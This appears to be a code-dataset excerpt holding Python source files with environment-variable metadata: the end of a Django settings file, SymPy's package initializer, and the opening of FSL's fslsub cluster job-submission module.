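# export DB_HOST=db DB_NAME=app DB_USER=postgres DB_PASS=secret DB_PORT=5432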
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator",
},
{"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator",},
{"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator",},
{"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator",},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = "en-us"
TIME_ZONE = "UTC"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = "/static/"
AUTH_USER_MODEL = "core.User"
| [] | [] | [
"DB_HOST",
"DB_PORT",
"DB_NAME",
"DB_PASS",
"DB_USER"
] | [] | ["DB_HOST", "DB_PORT", "DB_NAME", "DB_PASS", "DB_USER"] | python | 5 | 0 | |
sympy/__init__.py | """
SymPy is a Python library for symbolic mathematics. It aims to become a
full-featured computer algebra system (CAS) while keeping the code as simple
as possible in order to be comprehensible and easily extensible. SymPy is
written entirely in Python. It depends on mpmath, and other external libraries
may be optionally for things like plotting support.
See the webpage for more information and documentation:
https://sympy.org
"""
import sys
if sys.version_info < (3, 6):
raise ImportError("Python version 3.6 or above is required for SymPy.")
del sys
try:
import mpmath
except ImportError:
raise ImportError("SymPy now depends on mpmath as an external library. "
"See https://docs.sympy.org/latest/install.html#mpmath for more information.")
del mpmath
from sympy.release import __version__
if 'dev' in __version__:
def enable_warnings():
import warnings
warnings.filterwarnings('default', '.*', DeprecationWarning, module='sympy.*')
del warnings
enable_warnings()
del enable_warnings
def __sympy_debug():
# helper function so we don't import os globally
import os
debug_str = os.getenv('SYMPY_DEBUG', 'False')
if debug_str in ('True', 'False'):
return eval(debug_str)
else:
raise RuntimeError("unrecognized value for SYMPY_DEBUG: %s" %
debug_str)
SYMPY_DEBUG = __sympy_debug() # type: bool
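# Example: running `SYMPY_DEBUG=True python -c "import sympy"` turns the flag
# on; any value other than 'True' or 'False' raises the RuntimeError above.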
from .core import (sympify, SympifyError, cacheit, Basic, Atom,
preorder_traversal, S, Expr, AtomicExpr, UnevaluatedExpr, Symbol,
Wild, Dummy, symbols, var, Number, Float, Rational, Integer,
NumberSymbol, RealNumber, igcd, ilcm, seterr, E, I, nan, oo, pi, zoo,
AlgebraicNumber, comp, mod_inverse, Pow, integer_nthroot, integer_log,
Mul, prod, Add, Mod, Rel, Eq, Ne, Lt, Le, Gt, Ge, Equality,
GreaterThan, LessThan, Unequality, StrictGreaterThan, StrictLessThan,
vectorize, Lambda, WildFunction, Derivative, diff, FunctionClass,
Function, Subs, expand, PoleError, count_ops, expand_mul, expand_log,
expand_func, expand_trig, expand_complex, expand_multinomial, nfloat,
expand_power_base, expand_power_exp, arity, PrecisionExhausted, N,
evalf, Tuple, Dict, gcd_terms, factor_terms, factor_nc, evaluate,
Catalan, EulerGamma, GoldenRatio, TribonacciConstant)
from .logic import (to_cnf, to_dnf, to_nnf, And, Or, Not, Xor, Nand, Nor,
Implies, Equivalent, ITE, POSform, SOPform, simplify_logic, bool_map,
true, false, satisfiable)
from .assumptions import (AppliedPredicate, Predicate, AssumptionsContext,
assuming, Q, ask, register_handler, remove_handler, refine)
from .polys import (Poly, PurePoly, poly_from_expr, parallel_poly_from_expr,
degree, total_degree, degree_list, LC, LM, LT, pdiv, prem, pquo,
pexquo, div, rem, quo, exquo, half_gcdex, gcdex, invert,
subresultants, resultant, discriminant, cofactors, gcd_list, gcd,
lcm_list, lcm, terms_gcd, trunc, monic, content, primitive, compose,
decompose, sturm, gff_list, gff, sqf_norm, sqf_part, sqf_list, sqf,
factor_list, factor, intervals, refine_root, count_roots, real_roots,
nroots, ground_roots, nth_power_roots_poly, cancel, reduced, groebner,
is_zero_dimensional, GroebnerBasis, poly, symmetrize, horner,
interpolate, rational_interpolate, viete, together,
BasePolynomialError, ExactQuotientFailed, PolynomialDivisionFailed,
OperationNotSupported, HeuristicGCDFailed, HomomorphismFailed,
IsomorphismFailed, ExtraneousFactors, EvaluationFailed,
RefinementFailed, CoercionFailed, NotInvertible, NotReversible,
NotAlgebraic, DomainError, PolynomialError, UnificationFailed,
GeneratorsError, GeneratorsNeeded, ComputationFailed,
UnivariatePolynomialError, MultivariatePolynomialError,
PolificationFailed, OptionError, FlagError, minpoly,
minimal_polynomial, primitive_element, field_isomorphism,
to_number_field, isolate, itermonomials, Monomial, lex, grlex,
grevlex, ilex, igrlex, igrevlex, CRootOf, rootof, RootOf,
ComplexRootOf, RootSum, roots, Domain, FiniteField, IntegerRing,
RationalField, RealField, ComplexField, PythonFiniteField,
GMPYFiniteField, PythonIntegerRing, GMPYIntegerRing, PythonRational,
GMPYRationalField, AlgebraicField, PolynomialRing, FractionField,
ExpressionDomain, FF_python, FF_gmpy, ZZ_python, ZZ_gmpy, QQ_python,
QQ_gmpy, GF, FF, ZZ, QQ, ZZ_I, QQ_I, RR, CC, EX, EXRAW,
construct_domain, swinnerton_dyer_poly, cyclotomic_poly,
symmetric_poly, random_poly, interpolating_poly, jacobi_poly,
chebyshevt_poly, chebyshevu_poly, hermite_poly, legendre_poly,
laguerre_poly, apart, apart_list, assemble_partfrac_list, Options,
ring, xring, vring, sring, field, xfield, vfield, sfield)
from .series import (Order, O, limit, Limit, gruntz, series, approximants,
residue, EmptySequence, SeqPer, SeqFormula, sequence, SeqAdd, SeqMul,
fourier_series, fps, difference_delta, limit_seq)
from .functions import (factorial, factorial2, rf, ff, binomial,
RisingFactorial, FallingFactorial, subfactorial, carmichael,
fibonacci, lucas, motzkin, tribonacci, harmonic, bernoulli, bell, euler,
catalan, genocchi, partition, sqrt, root, Min, Max, Id, real_root,
cbrt, re, im, sign, Abs, conjugate, arg, polar_lift,
periodic_argument, unbranched_argument, principal_branch, transpose,
adjoint, polarify, unpolarify, sin, cos, tan, sec, csc, cot, sinc,
asin, acos, atan, asec, acsc, acot, atan2, exp_polar, exp, ln, log,
LambertW, sinh, cosh, tanh, coth, sech, csch, asinh, acosh, atanh,
acoth, asech, acsch, floor, ceiling, frac, Piecewise, piecewise_fold,
erf, erfc, erfi, erf2, erfinv, erfcinv, erf2inv, Ei, expint, E1, li,
Li, Si, Ci, Shi, Chi, fresnels, fresnelc, gamma, lowergamma,
uppergamma, polygamma, loggamma, digamma, trigamma, multigamma,
dirichlet_eta, zeta, lerchphi, polylog, stieltjes, Eijk, LeviCivita,
KroneckerDelta, SingularityFunction, DiracDelta, Heaviside,
bspline_basis, bspline_basis_set, interpolating_spline, besselj,
bessely, besseli, besselk, hankel1, hankel2, jn, yn, jn_zeros, hn1,
hn2, airyai, airybi, airyaiprime, airybiprime, marcumq, hyper,
meijerg, appellf1, legendre, assoc_legendre, hermite, chebyshevt,
chebyshevu, chebyshevu_root, chebyshevt_root, laguerre,
assoc_laguerre, gegenbauer, jacobi, jacobi_normalized, Ynm, Ynm_c,
Znm, elliptic_k, elliptic_f, elliptic_e, elliptic_pi, beta, mathieus,
mathieuc, mathieusprime, mathieucprime, riemann_xi, betainc, betainc_regularized)
from .ntheory import (nextprime, prevprime, prime, primepi, primerange,
randprime, Sieve, sieve, primorial, cycle_length, composite,
compositepi, isprime, divisors, proper_divisors, factorint,
multiplicity, perfect_power, pollard_pm1, pollard_rho, primefactors,
totient, trailing, divisor_count, proper_divisor_count, divisor_sigma,
factorrat, reduced_totient, primenu, primeomega,
mersenne_prime_exponent, is_perfect, is_mersenne_prime, is_abundant,
is_deficient, is_amicable, abundance, npartitions, is_primitive_root,
is_quad_residue, legendre_symbol, jacobi_symbol, n_order, sqrt_mod,
quadratic_residues, primitive_root, nthroot_mod, is_nthpow_residue,
sqrt_mod_iter, mobius, discrete_log, quadratic_congruence,
binomial_coefficients, binomial_coefficients_list,
multinomial_coefficients, continued_fraction_periodic,
continued_fraction_iterator, continued_fraction_reduce,
continued_fraction_convergents, continued_fraction, egyptian_fraction)
from .concrete import product, Product, summation, Sum
from .discrete import (fft, ifft, ntt, intt, fwht, ifwht, mobius_transform,
inverse_mobius_transform, convolution, covering_product,
intersecting_product)
from .simplify import (simplify, hypersimp, hypersimilar, logcombine,
separatevars, posify, besselsimp, kroneckersimp, signsimp, bottom_up,
nsimplify, FU, fu, sqrtdenest, cse, use, epath, EPath, hyperexpand,
collect, rcollect, radsimp, collect_const, fraction, numer, denom,
trigsimp, exptrigsimp, powsimp, powdenest, combsimp, gammasimp,
ratsimp, ratsimpmodprime)
from .sets import (Set, Interval, Union, EmptySet, FiniteSet, ProductSet,
Intersection, DisjointUnion, imageset, Complement, SymmetricDifference, ImageSet,
Range, ComplexRegion, Reals, Contains, ConditionSet, Ordinal,
OmegaPower, ord0, PowerSet, Naturals, Naturals0, UniversalSet,
Integers, Rationals)
from .solvers import (solve, solve_linear_system, solve_linear_system_LU,
solve_undetermined_coeffs, nsolve, solve_linear, checksol, det_quick,
inv_quick, check_assumptions, failing_assumptions, diophantine,
rsolve, rsolve_poly, rsolve_ratio, rsolve_hyper, checkodesol,
classify_ode, dsolve, homogeneous_order, solve_poly_system,
solve_triangulated, pde_separate, pde_separate_add, pde_separate_mul,
pdsolve, classify_pde, checkpdesol, ode_order, reduce_inequalities,
reduce_abs_inequality, reduce_abs_inequalities, solve_poly_inequality,
solve_rational_inequalities, solve_univariate_inequality, decompogen,
solveset, linsolve, linear_eq_to_matrix, nonlinsolve, substitution,
Complexes)
from .matrices import (ShapeError, NonSquareMatrixError, GramSchmidt,
casoratian, diag, eye, hessian, jordan_cell, list2numpy, matrix2numpy,
matrix_multiply_elementwise, ones, randMatrix, rot_axis1, rot_axis2,
rot_axis3, symarray, wronskian, zeros, MutableDenseMatrix,
DeferredVector, MatrixBase, Matrix, MutableMatrix,
MutableSparseMatrix, banded, ImmutableDenseMatrix,
ImmutableSparseMatrix, ImmutableMatrix, SparseMatrix, MatrixSlice,
BlockDiagMatrix, BlockMatrix, FunctionMatrix, Identity, Inverse,
MatAdd, MatMul, MatPow, MatrixExpr, MatrixSymbol, Trace, Transpose,
ZeroMatrix, OneMatrix, blockcut, block_collapse, matrix_symbols,
Adjoint, hadamard_product, HadamardProduct, HadamardPower,
Determinant, det, diagonalize_vector, DiagMatrix, DiagonalMatrix,
DiagonalOf, trace, DotProduct, kronecker_product, KroneckerProduct,
PermutationMatrix, MatrixPermute, Permanent, per)
from .geometry import (Point, Point2D, Point3D, Line, Ray, Segment, Line2D,
Segment2D, Ray2D, Line3D, Segment3D, Ray3D, Plane, Ellipse, Circle,
Polygon, RegularPolygon, Triangle, rad, deg, are_similar, centroid,
convex_hull, idiff, intersection, closest_points, farthest_points,
GeometryError, Curve, Parabola)
from .utilities import (flatten, group, take, subsets, variations,
numbered_symbols, cartes, capture, dict_merge, postorder_traversal,
interactive_traversal, prefixes, postfixes, sift, topological_sort,
unflatten, has_dups, has_variety, reshape, default_sort_key, ordered,
rotations, filldedent, lambdify, source, threaded, xthreaded, public,
memoize_property, timed)
from .integrals import (integrate, Integral, line_integrate, mellin_transform,
inverse_mellin_transform, MellinTransform, InverseMellinTransform,
laplace_transform, inverse_laplace_transform, LaplaceTransform,
InverseLaplaceTransform, fourier_transform, inverse_fourier_transform,
FourierTransform, InverseFourierTransform, sine_transform,
inverse_sine_transform, SineTransform, InverseSineTransform,
cosine_transform, inverse_cosine_transform, CosineTransform,
InverseCosineTransform, hankel_transform, inverse_hankel_transform,
HankelTransform, InverseHankelTransform, singularityintegrate)
from .tensor import (IndexedBase, Idx, Indexed, get_contraction_structure,
get_indices, shape, MutableDenseNDimArray, ImmutableDenseNDimArray,
MutableSparseNDimArray, ImmutableSparseNDimArray, NDimArray,
tensorproduct, tensorcontraction, tensordiagonal, derive_by_array,
permutedims, Array, DenseNDimArray, SparseNDimArray)
from .parsing import parse_expr
from .calculus import (euler_equations, singularities, is_increasing,
is_strictly_increasing, is_decreasing, is_strictly_decreasing,
is_monotonic, finite_diff_weights, apply_finite_diff, as_finite_diff,
differentiate_finite, periodicity, not_empty_in, AccumBounds,
is_convex, stationary_points, minimum, maximum)
from .algebras import Quaternion
from .printing import (pager_print, pretty, pretty_print, pprint,
pprint_use_unicode, pprint_try_use_unicode, latex, print_latex,
multiline_latex, mathml, print_mathml, python, print_python, pycode,
ccode, print_ccode, glsl_code, print_glsl, cxxcode, fcode,
print_fcode, rcode, print_rcode, jscode, print_jscode, julia_code,
mathematica_code, octave_code, rust_code, print_gtk, preview, srepr,
print_tree, StrPrinter, sstr, sstrrepr, TableForm, dotprint,
maple_code, print_maple_code)
from .testing import test, doctest
# This module causes conflicts with other modules:
# from .stats import *
# Adds about .04-.05 seconds of import time
# from combinatorics import *
# This module is slow to import:
#from physics import units
from .plotting import plot, textplot, plot_backends, plot_implicit, plot_parametric
from .interactive import init_session, init_printing
evalf._create_evalf_table()
__all__ = [
# sympy.core
'sympify', 'SympifyError', 'cacheit', 'Basic', 'Atom',
'preorder_traversal', 'S', 'Expr', 'AtomicExpr', 'UnevaluatedExpr',
'Symbol', 'Wild', 'Dummy', 'symbols', 'var', 'Number', 'Float',
'Rational', 'Integer', 'NumberSymbol', 'RealNumber', 'igcd', 'ilcm',
'seterr', 'E', 'I', 'nan', 'oo', 'pi', 'zoo', 'AlgebraicNumber', 'comp',
'mod_inverse', 'Pow', 'integer_nthroot', 'integer_log', 'Mul', 'prod',
'Add', 'Mod', 'Rel', 'Eq', 'Ne', 'Lt', 'Le', 'Gt', 'Ge', 'Equality',
'GreaterThan', 'LessThan', 'Unequality', 'StrictGreaterThan',
'StrictLessThan', 'vectorize', 'Lambda', 'WildFunction', 'Derivative',
'diff', 'FunctionClass', 'Function', 'Subs', 'expand', 'PoleError',
'count_ops', 'expand_mul', 'expand_log', 'expand_func', 'expand_trig',
'expand_complex', 'expand_multinomial', 'nfloat', 'expand_power_base',
'expand_power_exp', 'arity', 'PrecisionExhausted', 'N', 'evalf', 'Tuple',
'Dict', 'gcd_terms', 'factor_terms', 'factor_nc', 'evaluate', 'Catalan',
'EulerGamma', 'GoldenRatio', 'TribonacciConstant',
# sympy.logic
'to_cnf', 'to_dnf', 'to_nnf', 'And', 'Or', 'Not', 'Xor', 'Nand', 'Nor',
'Implies', 'Equivalent', 'ITE', 'POSform', 'SOPform', 'simplify_logic',
'bool_map', 'true', 'false', 'satisfiable',
# sympy.assumptions
'AppliedPredicate', 'Predicate', 'AssumptionsContext', 'assuming', 'Q',
'ask', 'register_handler', 'remove_handler', 'refine',
# sympy.polys
'Poly', 'PurePoly', 'poly_from_expr', 'parallel_poly_from_expr', 'degree',
'total_degree', 'degree_list', 'LC', 'LM', 'LT', 'pdiv', 'prem', 'pquo',
'pexquo', 'div', 'rem', 'quo', 'exquo', 'half_gcdex', 'gcdex', 'invert',
'subresultants', 'resultant', 'discriminant', 'cofactors', 'gcd_list',
'gcd', 'lcm_list', 'lcm', 'terms_gcd', 'trunc', 'monic', 'content',
'primitive', 'compose', 'decompose', 'sturm', 'gff_list', 'gff',
'sqf_norm', 'sqf_part', 'sqf_list', 'sqf', 'factor_list', 'factor',
'intervals', 'refine_root', 'count_roots', 'real_roots', 'nroots',
'ground_roots', 'nth_power_roots_poly', 'cancel', 'reduced', 'groebner',
'is_zero_dimensional', 'GroebnerBasis', 'poly', 'symmetrize', 'horner',
'interpolate', 'rational_interpolate', 'viete', 'together',
'BasePolynomialError', 'ExactQuotientFailed', 'PolynomialDivisionFailed',
'OperationNotSupported', 'HeuristicGCDFailed', 'HomomorphismFailed',
'IsomorphismFailed', 'ExtraneousFactors', 'EvaluationFailed',
'RefinementFailed', 'CoercionFailed', 'NotInvertible', 'NotReversible',
'NotAlgebraic', 'DomainError', 'PolynomialError', 'UnificationFailed',
'GeneratorsError', 'GeneratorsNeeded', 'ComputationFailed',
'UnivariatePolynomialError', 'MultivariatePolynomialError',
'PolificationFailed', 'OptionError', 'FlagError', 'minpoly',
'minimal_polynomial', 'primitive_element', 'field_isomorphism',
'to_number_field', 'isolate', 'itermonomials', 'Monomial', 'lex', 'grlex',
'grevlex', 'ilex', 'igrlex', 'igrevlex', 'CRootOf', 'rootof', 'RootOf',
'ComplexRootOf', 'RootSum', 'roots', 'Domain', 'FiniteField',
'IntegerRing', 'RationalField', 'RealField', 'ComplexField',
'PythonFiniteField', 'GMPYFiniteField', 'PythonIntegerRing',
'GMPYIntegerRing', 'PythonRational', 'GMPYRationalField',
'AlgebraicField', 'PolynomialRing', 'FractionField', 'ExpressionDomain',
'FF_python', 'FF_gmpy', 'ZZ_python', 'ZZ_gmpy', 'QQ_python', 'QQ_gmpy',
'GF', 'FF', 'ZZ', 'QQ', 'ZZ_I', 'QQ_I', 'RR', 'CC', 'EX', 'EXRAW',
'construct_domain', 'swinnerton_dyer_poly', 'cyclotomic_poly',
'symmetric_poly', 'random_poly', 'interpolating_poly', 'jacobi_poly',
'chebyshevt_poly', 'chebyshevu_poly', 'hermite_poly', 'legendre_poly',
'laguerre_poly', 'apart', 'apart_list', 'assemble_partfrac_list',
'Options', 'ring', 'xring', 'vring', 'sring', 'field', 'xfield', 'vfield',
'sfield',
# sympy.series
'Order', 'O', 'limit', 'Limit', 'gruntz', 'series', 'approximants',
'residue', 'EmptySequence', 'SeqPer', 'SeqFormula', 'sequence', 'SeqAdd',
'SeqMul', 'fourier_series', 'fps', 'difference_delta', 'limit_seq',
# sympy.functions
'factorial', 'factorial2', 'rf', 'ff', 'binomial', 'RisingFactorial',
'FallingFactorial', 'subfactorial', 'carmichael', 'fibonacci', 'lucas',
'motzkin', 'tribonacci', 'harmonic', 'bernoulli', 'bell', 'euler', 'catalan',
'genocchi', 'partition', 'sqrt', 'root', 'Min', 'Max', 'Id', 'real_root',
'cbrt', 're', 'im', 'sign', 'Abs', 'conjugate', 'arg', 'polar_lift',
'periodic_argument', 'unbranched_argument', 'principal_branch',
'transpose', 'adjoint', 'polarify', 'unpolarify', 'sin', 'cos', 'tan',
'sec', 'csc', 'cot', 'sinc', 'asin', 'acos', 'atan', 'asec', 'acsc',
'acot', 'atan2', 'exp_polar', 'exp', 'ln', 'log', 'LambertW', 'sinh',
'cosh', 'tanh', 'coth', 'sech', 'csch', 'asinh', 'acosh', 'atanh',
'acoth', 'asech', 'acsch', 'floor', 'ceiling', 'frac', 'Piecewise',
'piecewise_fold', 'erf', 'erfc', 'erfi', 'erf2', 'erfinv', 'erfcinv',
'erf2inv', 'Ei', 'expint', 'E1', 'li', 'Li', 'Si', 'Ci', 'Shi', 'Chi',
'fresnels', 'fresnelc', 'gamma', 'lowergamma', 'uppergamma', 'polygamma',
'loggamma', 'digamma', 'trigamma', 'multigamma', 'dirichlet_eta', 'zeta',
'lerchphi', 'polylog', 'stieltjes', 'Eijk', 'LeviCivita',
'KroneckerDelta', 'SingularityFunction', 'DiracDelta', 'Heaviside',
'bspline_basis', 'bspline_basis_set', 'interpolating_spline', 'besselj',
'bessely', 'besseli', 'besselk', 'hankel1', 'hankel2', 'jn', 'yn',
'jn_zeros', 'hn1', 'hn2', 'airyai', 'airybi', 'airyaiprime',
'airybiprime', 'marcumq', 'hyper', 'meijerg', 'appellf1', 'legendre',
'assoc_legendre', 'hermite', 'chebyshevt', 'chebyshevu',
'chebyshevu_root', 'chebyshevt_root', 'laguerre', 'assoc_laguerre',
'gegenbauer', 'jacobi', 'jacobi_normalized', 'Ynm', 'Ynm_c', 'Znm',
'elliptic_k', 'elliptic_f', 'elliptic_e', 'elliptic_pi', 'beta',
'mathieus', 'mathieuc', 'mathieusprime', 'mathieucprime', 'riemann_xi','betainc',
'betainc_regularized',
# sympy.ntheory
'nextprime', 'prevprime', 'prime', 'primepi', 'primerange', 'randprime',
'Sieve', 'sieve', 'primorial', 'cycle_length', 'composite', 'compositepi',
'isprime', 'divisors', 'proper_divisors', 'factorint', 'multiplicity',
'perfect_power', 'pollard_pm1', 'pollard_rho', 'primefactors', 'totient',
'trailing', 'divisor_count', 'proper_divisor_count', 'divisor_sigma',
'factorrat', 'reduced_totient', 'primenu', 'primeomega',
'mersenne_prime_exponent', 'is_perfect', 'is_mersenne_prime',
'is_abundant', 'is_deficient', 'is_amicable', 'abundance', 'npartitions',
'is_primitive_root', 'is_quad_residue', 'legendre_symbol',
'jacobi_symbol', 'n_order', 'sqrt_mod', 'quadratic_residues',
'primitive_root', 'nthroot_mod', 'is_nthpow_residue', 'sqrt_mod_iter',
'mobius', 'discrete_log', 'quadratic_congruence', 'binomial_coefficients',
'binomial_coefficients_list', 'multinomial_coefficients',
'continued_fraction_periodic', 'continued_fraction_iterator',
'continued_fraction_reduce', 'continued_fraction_convergents',
'continued_fraction', 'egyptian_fraction',
# sympy.concrete
'product', 'Product', 'summation', 'Sum',
# sympy.discrete
'fft', 'ifft', 'ntt', 'intt', 'fwht', 'ifwht', 'mobius_transform',
'inverse_mobius_transform', 'convolution', 'covering_product',
'intersecting_product',
# sympy.simplify
'simplify', 'hypersimp', 'hypersimilar', 'logcombine', 'separatevars',
'posify', 'besselsimp', 'kroneckersimp', 'signsimp', 'bottom_up',
'nsimplify', 'FU', 'fu', 'sqrtdenest', 'cse', 'use', 'epath', 'EPath',
'hyperexpand', 'collect', 'rcollect', 'radsimp', 'collect_const',
'fraction', 'numer', 'denom', 'trigsimp', 'exptrigsimp', 'powsimp',
'powdenest', 'combsimp', 'gammasimp', 'ratsimp', 'ratsimpmodprime',
# sympy.sets
'Set', 'Interval', 'Union', 'EmptySet', 'FiniteSet', 'ProductSet',
'Intersection', 'imageset', 'DisjointUnion', 'Complement', 'SymmetricDifference',
'ImageSet', 'Range', 'ComplexRegion', 'Reals', 'Contains', 'ConditionSet',
'Ordinal', 'OmegaPower', 'ord0', 'PowerSet', 'Naturals',
'Naturals0', 'UniversalSet', 'Integers', 'Rationals',
# sympy.solvers
'solve', 'solve_linear_system', 'solve_linear_system_LU',
'solve_undetermined_coeffs', 'nsolve', 'solve_linear', 'checksol',
'det_quick', 'inv_quick', 'check_assumptions', 'failing_assumptions',
'diophantine', 'rsolve', 'rsolve_poly', 'rsolve_ratio', 'rsolve_hyper',
'checkodesol', 'classify_ode', 'dsolve', 'homogeneous_order',
'solve_poly_system', 'solve_triangulated', 'pde_separate',
'pde_separate_add', 'pde_separate_mul', 'pdsolve', 'classify_pde',
'checkpdesol', 'ode_order', 'reduce_inequalities',
'reduce_abs_inequality', 'reduce_abs_inequalities',
'solve_poly_inequality', 'solve_rational_inequalities',
'solve_univariate_inequality', 'decompogen', 'solveset', 'linsolve',
'linear_eq_to_matrix', 'nonlinsolve', 'substitution', 'Complexes',
# sympy.matrices
'ShapeError', 'NonSquareMatrixError', 'GramSchmidt', 'casoratian', 'diag',
'eye', 'hessian', 'jordan_cell', 'list2numpy', 'matrix2numpy',
'matrix_multiply_elementwise', 'ones', 'randMatrix', 'rot_axis1',
'rot_axis2', 'rot_axis3', 'symarray', 'wronskian', 'zeros',
'MutableDenseMatrix', 'DeferredVector', 'MatrixBase', 'Matrix',
'MutableMatrix', 'MutableSparseMatrix', 'banded', 'ImmutableDenseMatrix',
'ImmutableSparseMatrix', 'ImmutableMatrix', 'SparseMatrix', 'MatrixSlice',
'BlockDiagMatrix', 'BlockMatrix', 'FunctionMatrix', 'Identity', 'Inverse',
'MatAdd', 'MatMul', 'MatPow', 'MatrixExpr', 'MatrixSymbol', 'Trace',
'Transpose', 'ZeroMatrix', 'OneMatrix', 'blockcut', 'block_collapse',
'matrix_symbols', 'Adjoint', 'hadamard_product', 'HadamardProduct',
'HadamardPower', 'Determinant', 'det', 'diagonalize_vector', 'DiagMatrix',
'DiagonalMatrix', 'DiagonalOf', 'trace', 'DotProduct',
'kronecker_product', 'KroneckerProduct', 'PermutationMatrix',
'MatrixPermute', 'Permanent', 'per',
# sympy.geometry
'Point', 'Point2D', 'Point3D', 'Line', 'Ray', 'Segment', 'Line2D',
'Segment2D', 'Ray2D', 'Line3D', 'Segment3D', 'Ray3D', 'Plane', 'Ellipse',
'Circle', 'Polygon', 'RegularPolygon', 'Triangle', 'rad', 'deg',
'are_similar', 'centroid', 'convex_hull', 'idiff', 'intersection',
'closest_points', 'farthest_points', 'GeometryError', 'Curve', 'Parabola',
# sympy.utilities
'flatten', 'group', 'take', 'subsets', 'variations', 'numbered_symbols',
'cartes', 'capture', 'dict_merge', 'postorder_traversal',
'interactive_traversal', 'prefixes', 'postfixes', 'sift',
'topological_sort', 'unflatten', 'has_dups', 'has_variety', 'reshape',
'default_sort_key', 'ordered', 'rotations', 'filldedent', 'lambdify',
'source', 'threaded', 'xthreaded', 'public', 'memoize_property', 'timed',
# sympy.integrals
'integrate', 'Integral', 'line_integrate', 'mellin_transform',
'inverse_mellin_transform', 'MellinTransform', 'InverseMellinTransform',
'laplace_transform', 'inverse_laplace_transform', 'LaplaceTransform',
'InverseLaplaceTransform', 'fourier_transform',
'inverse_fourier_transform', 'FourierTransform',
'InverseFourierTransform', 'sine_transform', 'inverse_sine_transform',
'SineTransform', 'InverseSineTransform', 'cosine_transform',
'inverse_cosine_transform', 'CosineTransform', 'InverseCosineTransform',
'hankel_transform', 'inverse_hankel_transform', 'HankelTransform',
'InverseHankelTransform', 'singularityintegrate',
# sympy.tensor
'IndexedBase', 'Idx', 'Indexed', 'get_contraction_structure',
'get_indices', 'shape', 'MutableDenseNDimArray', 'ImmutableDenseNDimArray',
'MutableSparseNDimArray', 'ImmutableSparseNDimArray', 'NDimArray',
'tensorproduct', 'tensorcontraction', 'tensordiagonal', 'derive_by_array',
'permutedims', 'Array', 'DenseNDimArray', 'SparseNDimArray',
# sympy.parsing
'parse_expr',
# sympy.calculus
'euler_equations', 'singularities', 'is_increasing',
'is_strictly_increasing', 'is_decreasing', 'is_strictly_decreasing',
'is_monotonic', 'finite_diff_weights', 'apply_finite_diff',
'as_finite_diff', 'differentiate_finite', 'periodicity', 'not_empty_in',
'AccumBounds', 'is_convex', 'stationary_points', 'minimum', 'maximum',
# sympy.algebras
'Quaternion',
# sympy.printing
'pager_print', 'pretty', 'pretty_print', 'pprint', 'pprint_use_unicode',
'pprint_try_use_unicode', 'latex', 'print_latex', 'multiline_latex',
'mathml', 'print_mathml', 'python', 'print_python', 'pycode', 'ccode',
'print_ccode', 'glsl_code', 'print_glsl', 'cxxcode', 'fcode',
'print_fcode', 'rcode', 'print_rcode', 'jscode', 'print_jscode',
'julia_code', 'mathematica_code', 'octave_code', 'rust_code', 'print_gtk',
'preview', 'srepr', 'print_tree', 'StrPrinter', 'sstr', 'sstrrepr',
'TableForm', 'dotprint', 'maple_code', 'print_maple_code',
# sympy.plotting
'plot', 'textplot', 'plot_backends', 'plot_implicit', 'plot_parametric',
# sympy.interactive
'init_session', 'init_printing',
# sympy.testing
'test', 'doctest',
]
#===========================================================================#
# #
# XXX: The names below were importable before sympy 1.6 using #
# #
# from sympy import * #
# #
# This happened implicitly because there was no __all__ defined in this #
# __init__.py file. Not every package is imported. The list matches what #
# would have been imported before. It is possible that these packages will #
# not be imported by a star-import from sympy in future. #
# #
#===========================================================================#
__all__.extend((
'algebras',
'assumptions',
'calculus',
'concrete',
'discrete',
'external',
'functions',
'geometry',
'interactive',
'multipledispatch',
'ntheory',
'parsing',
'plotting',
'polys',
'printing',
'release',
'strategies',
'tensor',
'utilities',
))
| [] | [] | [
"SYMPY_DEBUG"
] | [] | ["SYMPY_DEBUG"] | python | 1 | 0 | |
fsl/utils/fslsub.py | #!/usr/bin/env python
#
# fslsub.py - Functions for using fsl_sub.
#
# Author: Michiel Cottaar <[email protected]>
#
"""This module submits jobs to a computing cluster using FSL's fsl_sub command
line tool. It is assumed that the computing cluster is managed by SGE.
Example usage, building a short pipeline::
from fsl.utils.fslsub import submit
# submits bet to veryshort queue unless <mask_filename> already exists
bet_job = submit('bet <input_filename> -m',
queue='veryshort.q',
output='<mask_filename>')
# submits another job
other_job = submit('some other pre-processing step', queue='short.q')
# submits cuda job, that should only start after both preparatory jobs are
# finished. This will work if bet_job and other_job are single job-ids
# (i.e., strings) or a sequence of multiple job-ids
cuda_job = submit('expensive job',
wait_for=(bet_job, other_job),
queue='cuda.q')
.. autosummary::
:nosignatures:
submit
info
output
func_to_cmd
hold
"""
from io import BytesIO
import os.path as op
import glob
import time
import pickle
import sys
import tempfile
import logging
import importlib
from dataclasses import dataclass, asdict
from typing import Optional, Collection, Union, Tuple, Dict
import argparse
import warnings
import os
import fsl.utils.deprecated as deprecated
log = logging.getLogger(__name__)
@dataclass
class SubmitParams(object):
"""Represents the fsl_sub parameters
The ``SubmitParams`` class is deprecated - you should use
:mod:`fsl.wrappers.fsl_sub` instead, or use the ``fsl_sub`` Python
library, which is installed as part of FSL.
Any command line script can be submitted with these parameters by calling the `SubmitParams` object:
.. code-block:: python
submit = SubmitParams(minutes=1, logdir='log', wait_for=['108023', '108019'])
submit('echo finished')
This will run "echo finished" with a maximum runtime of 1 minute after the jobs with IDs 108023 and 108019 are finished.
It is the equivalent of
.. code-block:: bash
fsl_sub -T 1 -l log -j 108023,108019 "echo finished"
For python scripts that submit themselves to the cluster, it might be useful to give the user some control
over at least some of the submission parameters. This can be done using:
.. code-block:: python
import argparse
parser = argparse.ArgumentParser("my script doing awesome stuff")
parser.add_argument("input_file")
parser.add_argument("output_file")
SubmitParams.add_to_parser(parser, include=('wait_for', 'logdir'))
args = parser.parse_args()
submitter = SubmitParams.from_args(args).update(minutes=10)
from fsl import wrappers
wrappers.bet(input_file, output_file, fslsub=submitter)
This submits a BET job using the -j and -l flags set by the user and a maximum time of 10 minutes.
"""
minutes: Optional[float] = None
queue: Optional[str] = None
